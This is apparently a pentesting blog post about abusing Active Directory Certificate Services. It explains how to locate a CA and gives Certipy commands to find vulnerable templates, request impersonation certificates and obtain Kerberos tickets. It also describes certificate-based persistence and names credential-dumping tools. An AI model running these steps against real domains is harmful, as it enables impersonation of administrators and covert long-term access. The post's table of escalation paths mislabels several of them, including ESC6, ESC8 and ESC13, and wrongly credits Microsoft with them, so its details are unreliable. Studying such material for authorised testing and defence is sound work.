/ Uncategorized / By

Active Directory Certificate Services (AD CS) for Pentesters

The Trust Engine You Were Never Meant to Touch

Active Directory Certificate Services (AD CS) is the Windows PKI infrastructure that hands out digital certificates to people, computers, and services. It’s built to enable trust — but trust, as every good pentester knows, can be a weapon.

In this post, we’ll break down:

  • What AD CS is and why organizations use it
  • The protocols it runs on
  • How to check if it’s deployed
  • How attackers can abuse common misconfigurations
  • Real-world attack paths involving ESC1 to ESC13 (yes, that’s a thing)
  • Practical exploitation techniques and tools

What Is Active Directory Certificate Services?

AD CS is Microsoft’s Public Key Infrastructure (PKI). It allows organizations to issue digital certificates to users and machines for:

  • Smartcard logon
  • Secure email (S/MIME)
  • EFS (Encrypting File System)
  • TLS (HTTPS and RDP encryption)
  • Client authentication (Kerberos, VPN, Wi-Fi)

Instead of passwords, it gives out certificates. These certificates prove identity and are often trusted implicitly within the domain.Under the Hood: Protocols and Components

Protocols used:

  • HTTP/S: Web enrollment and enrollment via certsrv
  • DCOM / RPC: Backend certificate issuance and management
  • Kerberos: Authentication
  • LDAP: Storage of certificate templates and configuration in AD

Key components:

  • CA (Certificate Authority): The server that issues certs
  • Certificate Templates: Define who can request what type of cert
  • Enrollment Services: Accepts requests and issues certs
  • Web Enrollment (Optional): A web UI on http://<CA>/certsrv for cert requests

How to Check If AD CS Is Active

If you’re inside the domain (or even partially authenticated), here’s how to hunt it down.

1. Check for the CA in Active Directory:

Get-ADObject -Filter {objectClass -eq "pKIEnrollmentService"} -Property *
# Or use certipy

2. Discover via DNS or HTTP:

nslookup -type=SRV _certsrv._tcp.DOMAIN.LOCAL

Or:

curl http://<domain-controller>/certsrv/

If you get a web page — bingo. AD CS is active and web enrollment is exposed.

Why Pentesters Should Care

Here’s the key point:

If AD CS is misconfigured, you can request certificates that impersonate users — even Domain Admins.

These certs can be used to authenticate over Kerberos using PKINIT, allowing you to:

  • Authenticate as a domain user without knowing their password
  • Persist access by abusing long-lived certificates
  • Bypass MFA, account lockout, and password policies

Common Misconfigurations and Exploits

Microsoft released 13 escalation paths, known as ESC1 to ESC13, documented by SpecterOps.

ESC1: The Big One

Danger: Low-priv users can enroll for certs that grant authentication privileges.

If a template:

  • Allows Domain Users to enroll
  • Has Client Authentication EKU
  • Does not require manager approval

→ Any authenticated user can request a cert and impersonate any user (including DA).

Other Key Escalation Paths:

Esc IDMisconfig SummaryImpact
ESC1Low-priv user can request auth certFull domain compromise
ESC2Enrollment agent can request certs for othersUser impersonation
ESC3Misused certificate mapping + web enrollmentCert request impersonation
ESC4CT with dangerous security descriptorsAbuse via ACL permissions
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2 flag on templateCustom UPN injection (impersonation)
ESC8Vulnerable CA permissions (EDITF_ATTRIBUTESUBJECT…)Full abuse of request formats
ESC13NTLM relay to AD CS HTTP interfaceWeaponized relay → cert issue

You don’t need to memorize them all. But ESC1, ESC6, and ESC13 are the most abused in the wild.

How to Exploit AD CS as a Pentester

Let’s walk through the tools and steps.

1. Discover Vulnerable Templates

Use Certipy:

certipy find -u 'domain\user' -p 'Password123' -dc-ip <IP> -target <domain>

This will show:

  • Vulnerable templates (ESC1, ESC6, etc.)
  • If enrollment is possible
  • If certificates can be used for authentication

2. Request a Certificate

Once you’ve found a vulnerable template:

certipy req -u 'domain\user' -p 'Password123' -ca <ca-name> -template <template-name> -target <domain>

This gives you a .pfx cert and private key.

3. Use the Cert to Authenticate

Convert the .pfx to .ccache for Kerberos auth:

certipy auth -pfx user.pfx -domain <domain>

This gives you a Kerberos TGT in .ccache format.

Then you can use tools like:

  • smbclient
  • secretsdump.py
  • wmiexec.py
  • impacket-smbserver

With KRB5CCNAME=./user.ccache environment variable.

Persistence with AD CS

If you have domain admin or control over a template:

  • Add Client Authentication EKU
  • Grant “Enroll” to a low-priv user
  • Request a cert
  • Reuse it indefinitely (certs can be valid for years)

This is stealthy persistence that doesn’t rely on passwords, tokens, or services.

Final Thoughts

AD CS is the backdoor to Active Directory that no one thinks to lock. If Kerberos is the gatekeeper, certificates are the skeleton keys.

As a pentester, mastering AD CS means:

  • Knowing when it’s in play
  • Hunting for misconfigured templates
  • Forging your way into the kingdom with a certificate and a smile

Related Posts

Scroll to Top